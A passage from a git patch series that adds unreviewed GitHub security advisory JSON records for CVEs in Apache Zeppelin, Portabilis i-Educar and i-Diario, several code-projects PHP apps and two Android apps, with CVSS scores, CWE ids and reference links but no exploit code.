"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8502" + }, + { + "type": "WEB", + "url": "https://github.com/freshfish-hust/my-cves/issues/1" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318601" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318601" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626920" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T07:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-ffrh-25w3-cmvh/GHSA-ffrh-25w3-cmvh.json b/advisories/unreviewed/2025/08/GHSA-ffrh-25w3-cmvh/GHSA-ffrh-25w3-cmvh.json new file mode 100644 index 0000000000000..dea1b761fd80f --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-ffrh-25w3-cmvh/GHSA-ffrh-25w3-cmvh.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ffrh-25w3-cmvh", + "modified": "2025-08-03T09:31:50Z", + "published": "2025-08-03T09:31:50Z", + "aliases": [ + "CVE-2025-8506" + ], + "details": "A vulnerability was found in 495300897 wx-shop up to de1b66331368695779cfc6e4d11a64caddf8716e and classified as problematic. This issue affects some unknown processing of the file /user/editUI. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8506" + }, + { + "type": "WEB", + "url": "https://github.com/Bemcliu/cve-reports/blob/main/cve-07-wx-shop-Stored%20XSS/readme.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318605" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318605" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.627323" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T09:15:29Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-q2w7-9xcp-64v5/GHSA-q2w7-9xcp-64v5.json b/advisories/unreviewed/2025/08/GHSA-q2w7-9xcp-64v5/GHSA-q2w7-9xcp-64v5.json new file mode 100644 index 0000000000000..e725eec16ac1d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-q2w7-9xcp-64v5/GHSA-q2w7-9xcp-64v5.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2w7-9xcp-64v5", + "modified": "2025-08-03T09:31:49Z", + "published": "2025-08-03T09:31:49Z", + "aliases": [ + "CVE-2025-8504" + ], + "details": "A vulnerability, which was classified as critical, was found in code-projects Kitchen Treasure 1.0. This affects an unknown part of the file /userregistration.php. The manipulation of the argument photo leads to unrestricted upload. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8504" + }, + { + "type": "WEB", + "url": "https://github.com/freshfish-hust/my-cves/issues/4" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318603" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318603" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626935" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T08:15:24Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-r935-cx2h-crwf/GHSA-r935-cx2h-crwf.json b/advisories/unreviewed/2025/08/GHSA-r935-cx2h-crwf/GHSA-r935-cx2h-crwf.json new file mode 100644 index 0000000000000..d30b10246c790 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-r935-cx2h-crwf/GHSA-r935-cx2h-crwf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r935-cx2h-crwf", + "modified": "2025-08-03T09:31:49Z", + "published": "2025-08-03T09:31:49Z", + "aliases": [ + "CVE-2025-8503" + ], + "details": "A vulnerability, which was classified as critical, has been found in code-projects Online Medicine Guide 1.0. Affected by this issue is some unknown functionality of the file /adaddmed.php. The manipulation of the argument mname leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8503" + }, + { + "type": "WEB", + "url": "https://github.com/freshfish-hust/my-cves/issues/2" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318602" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318602" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.626923" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T07:15:25Z" + } +} \ No newline at end of file From 8c0200e5345d2edeb6a0fa221100f43d6c300c95 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 3 Aug 2025 12:32:09 +0000 Subject: [PATCH 320/323] Publish Advisories GHSA-474q-qj4j-p6r9 GHSA-4r3c-9hx8-87cc GHSA-jr43-q92q-5q82 GHSA-p288-459w-jxj6 GHSA-xg8j-j6vp-6h5w --- .../GHSA-474q-qj4j-p6r9.json | 56 +++++++++++++++++++ .../GHSA-4r3c-9hx8-87cc.json | 56 +++++++++++++++++++ .../GHSA-jr43-q92q-5q82.json | 43 ++++++++++++++ .../GHSA-p288-459w-jxj6.json | 39 +++++++++++++ .../GHSA-xg8j-j6vp-6h5w.json | 31 ++++++++++ 5 files changed, 225 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-474q-qj4j-p6r9/GHSA-474q-qj4j-p6r9.json create mode 100644 advisories/unreviewed/2025/08/GHSA-4r3c-9hx8-87cc/GHSA-4r3c-9hx8-87cc.json create mode 100644 advisories/unreviewed/2025/08/GHSA-jr43-q92q-5q82/GHSA-jr43-q92q-5q82.json create mode 100644 advisories/unreviewed/2025/08/GHSA-p288-459w-jxj6/GHSA-p288-459w-jxj6.json create mode 100644 advisories/unreviewed/2025/08/GHSA-xg8j-j6vp-6h5w/GHSA-xg8j-j6vp-6h5w.json diff --git a/advisories/unreviewed/2025/08/GHSA-474q-qj4j-p6r9/GHSA-474q-qj4j-p6r9.json b/advisories/unreviewed/2025/08/GHSA-474q-qj4j-p6r9/GHSA-474q-qj4j-p6r9.json new file mode 100644 index 0000000000000..14358b44be95d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-474q-qj4j-p6r9/GHSA-474q-qj4j-p6r9.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-474q-qj4j-p6r9", + "modified": "2025-08-03T12:30:30Z", + "published": "2025-08-03T12:30:30Z", + "aliases": [ + "CVE-2025-8507" + ], + "details": "A vulnerability was found in Portabilis i-Educar 2.9. It has been classified as problematic. Affected is an unknown function of the file /intranet/educar_funcao_lst.php. The manipulation of the argument nm_funcao/abreviatura leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8507" + }, + { + "type": "WEB", + "url": "https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8507.md" + }, + { + "type": "WEB", + "url": "https://github.com/marcelomulder/CVE/blob/main/i-educar/Reflected%20XXS%20educar_funcao_lst.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318606" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318606" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618677" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T10:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-4r3c-9hx8-87cc/GHSA-4r3c-9hx8-87cc.json b/advisories/unreviewed/2025/08/GHSA-4r3c-9hx8-87cc/GHSA-4r3c-9hx8-87cc.json new file mode 100644 index 0000000000000..37a188194c38d --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-4r3c-9hx8-87cc/GHSA-4r3c-9hx8-87cc.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4r3c-9hx8-87cc", + "modified": "2025-08-03T12:30:31Z", + "published": "2025-08-03T12:30:31Z", + "aliases": [ + "CVE-2025-8508" + ], + "details": "A vulnerability was found in Portabilis i-Educar 2.9. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /intranet/educar_avaliacao_desempenho_cad.php. The manipulation of the argument titulo_avaliacao/descricao leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8508" + }, + { + "type": "WEB", + "url": "https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8508.md" + }, + { + "type": "WEB", + "url": "https://github.com/marcelomulder/CVE/blob/main/i-educar/Stored%20XSS%20educar_avaliacao_desempenho_cad.php%20parameters%20titulo_avaliacao%20and%20descricao.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318607" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318607" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618678" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T11:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-jr43-q92q-5q82/GHSA-jr43-q92q-5q82.json b/advisories/unreviewed/2025/08/GHSA-jr43-q92q-5q82/GHSA-jr43-q92q-5q82.json new file mode 100644 index 0000000000000..c087facf49eff --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-jr43-q92q-5q82/GHSA-jr43-q92q-5q82.json @@ -0,0 +1,43 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jr43-q92q-5q82", + "modified": "2025-08-03T12:30:30Z", + "published": "2025-08-03T12:30:30Z", + "aliases": [ + "CVE-2024-52279" + ], + "details": "Improper Input Validation vulnerability in Apache Zeppelin. The fix for JDBC URL validation in CVE-2024-31864 did not account for URL encoded input.\n\nThis issue affects Apache Zeppelin: from 0.11.1 before 0.12.0.\n\nUsers are recommended to upgrade to version 0.12.0, which fixes the issue.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-52279" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4838" + }, + { + "type": "WEB", + "url": "https://issues.apache.org/jira/browse/ZEPPELIN-6095" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/dxb98vgrb21rrl3k0fzonpk66onr6o4q" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2024-31864" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T10:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-p288-459w-jxj6/GHSA-p288-459w-jxj6.json b/advisories/unreviewed/2025/08/GHSA-p288-459w-jxj6/GHSA-p288-459w-jxj6.json new file mode 100644 index 0000000000000..0d49ae405e28b --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-p288-459w-jxj6/GHSA-p288-459w-jxj6.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p288-459w-jxj6", + "modified": "2025-08-03T12:30:30Z", + "published": "2025-08-03T12:30:30Z", + "aliases": [ + "CVE-2024-41177" + ], + "details": "Incomplete Blacklist to Cross-Site Scripting vulnerability in Apache Zeppelin.\n\nThis issue affects Apache Zeppelin: before 0.12.0.\n\nUsers are recommended to upgrade to version 0.12.0, which fixes the issue.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41177" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4755" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4795" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/nwh8vh9f3pnvt04n8z4g2kbddh62blr6" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T10:15:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-xg8j-j6vp-6h5w/GHSA-xg8j-j6vp-6h5w.json b/advisories/unreviewed/2025/08/GHSA-xg8j-j6vp-6h5w/GHSA-xg8j-j6vp-6h5w.json new file mode 100644 index 0000000000000..53671dd6b2797 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-xg8j-j6vp-6h5w/GHSA-xg8j-j6vp-6h5w.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xg8j-j6vp-6h5w", + "modified": "2025-08-03T12:30:30Z", + "published": "2025-08-03T12:30:30Z", + "aliases": [ + "CVE-2024-51775" + ], + "details": "Missing Origin Validation in WebSockets vulnerability in Apache Zeppelin.\n\nThe attacker could access the Zeppelin server from another origin without any restriction, and get internal information about paragraphs. \nThis issue affects Apache Zeppelin: from 0.11.1 before 0.12.0.\n\nUsers are recommended to upgrade to version 0.12.0, which fixes the issue.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51775" + }, + { + "type": "WEB", + "url": "https://github.com/apache/zeppelin/pull/4823" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1385" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T11:15:26Z" + } +} \ No newline at end of file From 2d349f489da2890e808f6de8c416895d9744af43 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 3 Aug 2025 15:32:25 +0000 Subject: [PATCH 321/323] Publish Advisories GHSA-gh34-234w-fjmf GHSA-hpf2-m375-95rh GHSA-jcmg-5j8j-35mp GHSA-q2qr-vvq7-ph4v GHSA-wv59-72h6-vhj4 --- .../GHSA-gh34-234w-fjmf.json | 56 +++++++++++++++++ .../GHSA-hpf2-m375-95rh.json | 56 +++++++++++++++++ .../GHSA-jcmg-5j8j-35mp.json | 60 +++++++++++++++++++ .../GHSA-q2qr-vvq7-ph4v.json | 52 ++++++++++++++++ .../GHSA-wv59-72h6-vhj4.json | 52 ++++++++++++++++ 5 files changed, 276 insertions(+) create mode 100644 advisories/unreviewed/2025/08/GHSA-gh34-234w-fjmf/GHSA-gh34-234w-fjmf.json create mode 100644 advisories/unreviewed/2025/08/GHSA-hpf2-m375-95rh/GHSA-hpf2-m375-95rh.json create mode 100644 advisories/unreviewed/2025/08/GHSA-jcmg-5j8j-35mp/GHSA-jcmg-5j8j-35mp.json create mode 100644 advisories/unreviewed/2025/08/GHSA-q2qr-vvq7-ph4v/GHSA-q2qr-vvq7-ph4v.json create mode 100644 advisories/unreviewed/2025/08/GHSA-wv59-72h6-vhj4/GHSA-wv59-72h6-vhj4.json diff --git a/advisories/unreviewed/2025/08/GHSA-gh34-234w-fjmf/GHSA-gh34-234w-fjmf.json b/advisories/unreviewed/2025/08/GHSA-gh34-234w-fjmf/GHSA-gh34-234w-fjmf.json new file mode 100644 index 0000000000000..5967ee0264b74 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-gh34-234w-fjmf/GHSA-gh34-234w-fjmf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gh34-234w-fjmf", + "modified": "2025-08-03T15:30:26Z", + "published": "2025-08-03T15:30:26Z", + "aliases": [ + "CVE-2025-8509" + ], + "details": "A vulnerability was found in Portabilis i-Educar 2.9. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /intranet/educar_servidor_cad.php. The manipulation of the argument matricula leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8509" + }, + { + "type": "WEB", + "url": "https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-8509.md" + }, + { + "type": "WEB", + "url": "https://github.com/marcelomulder/CVE/blob/main/i-educar/Stored%20XSS%20educar_servidor_cad.php%20parameter%20matricula.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318608" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318608" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618679" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T13:15:25Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-hpf2-m375-95rh/GHSA-hpf2-m375-95rh.json b/advisories/unreviewed/2025/08/GHSA-hpf2-m375-95rh/GHSA-hpf2-m375-95rh.json new file mode 100644 index 0000000000000..6756cd04eadcb --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-hpf2-m375-95rh/GHSA-hpf2-m375-95rh.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hpf2-m375-95rh", + "modified": "2025-08-03T15:30:26Z", + "published": "2025-08-03T15:30:26Z", + "aliases": [ + "CVE-2025-8511" + ], + "details": "A vulnerability classified as problematic was found in Portabilis i-Diario 1.5.0. This vulnerability affects unknown code of the file /diario-de-observacoes/ of the component Observações. The manipulation of the argument Descrição leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8511" + }, + { + "type": "WEB", + "url": "https://github.com/marcelomulder/CVE/blob/main/i-diario/CVE-2025-8511.md" + }, + { + "type": "WEB", + "url": "https://github.com/marcelomulder/CVE/blob/main/i-diario/Stored%20XSS%20endpoint%20diario-de-observacoes.(ID)%20in%20'Observa%C3%A7%C3%B5es-Descri%C3%A7%C3%A3o'%20parameter.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318610" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318610" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618973" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T14:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-jcmg-5j8j-35mp/GHSA-jcmg-5j8j-35mp.json b/advisories/unreviewed/2025/08/GHSA-jcmg-5j8j-35mp/GHSA-jcmg-5j8j-35mp.json new file mode 100644 index 0000000000000..e7f19dc4bcfaa --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-jcmg-5j8j-35mp/GHSA-jcmg-5j8j-35mp.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jcmg-5j8j-35mp", + "modified": "2025-08-03T15:30:26Z", + "published": "2025-08-03T15:30:26Z", + "aliases": [ + "CVE-2025-8510" + ], + "details": "A vulnerability classified as problematic has been found in Portabilis i-Educar 2.10. This affects the function Gerar of the file ieducar/intranet/educar_matricula_lst.php. The manipulation of the argument ref_cod_aluno leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of the patch is 82c288b9a4abb084bdfa1c0c4ef777ed45f98b46. It is recommended to apply a patch to fix this issue. The vendor initially closed the original advisory without requesting a CVE.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8510" + }, + { + "type": "WEB", + "url": "https://github.com/portabilis/i-educar/commit/82c288b9a4abb084bdfa1c0c4ef777ed45f98b46" + }, + { + "type": "WEB", + "url": "https://github.com/CVE-Hunters/CVE/blob/main/i-educar/Reflected%20Cross-Site%20Scripting%20(XSS)%20in%20educar_matricula_lst.php%20via%20ref_cod_aluno%20Parameter.md" + }, + { + "type": "WEB", + "url": "https://github.com/portabilis/i-educar/compare/GHSA-88xc-64vw-g4xg" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318609" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318609" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.618964" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-q2qr-vvq7-ph4v/GHSA-q2qr-vvq7-ph4v.json b/advisories/unreviewed/2025/08/GHSA-q2qr-vvq7-ph4v/GHSA-q2qr-vvq7-ph4v.json new file mode 100644 index 0000000000000..702e406bfc6a9 --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-q2qr-vvq7-ph4v/GHSA-q2qr-vvq7-ph4v.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q2qr-vvq7-ph4v", + "modified": "2025-08-03T15:30:26Z", + "published": "2025-08-03T15:30:26Z", + "aliases": [ + "CVE-2025-8513" + ], + "details": "A vulnerability, which was classified as problematic, was found in Caixin News App 8.0.1 on Android. Affected is an unknown function of the file AndroidManifest.xml of the component com.caixin.news. The manipulation leads to improper export of android application components. Local access is required to approach this attack. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8513" + }, + { + "type": "WEB", + "url": "https://github.com/KMov-g/androidapps/blob/main/com.caixin.news.md" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318612" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318612" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.619029" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-926" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-08-03T15:15:38Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/08/GHSA-wv59-72h6-vhj4/GHSA-wv59-72h6-vhj4.json b/advisories/unreviewed/2025/08/GHSA-wv59-72h6-vhj4/GHSA-wv59-72h6-vhj4.json new file mode 100644 index 0000000000000..ae4bd0a5a0eba --- /dev/null +++ b/advisories/unreviewed/2025/08/GHSA-wv59-72h6-vhj4/GHSA-wv59-72h6-vhj4.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wv59-72h6-vhj4", + "modified": "2025-08-03T15:30:26Z", + "published": "2025-08-03T15:30:26Z", + "aliases": [ + "CVE-2025-8512" + ], + "details": "A vulnerability, which was classified as problematic, has been found in TVB Big Big Shop App 2.9.0 on Android. This issue affects some unknown processing of the file AndroidManifest.xml of the component hk.com.tvb.bigbigshop. The manipulation leads to improper export of android application components. An attack has to be approached locally. The exploit has been disclosed to the public and may be used. The vendor was 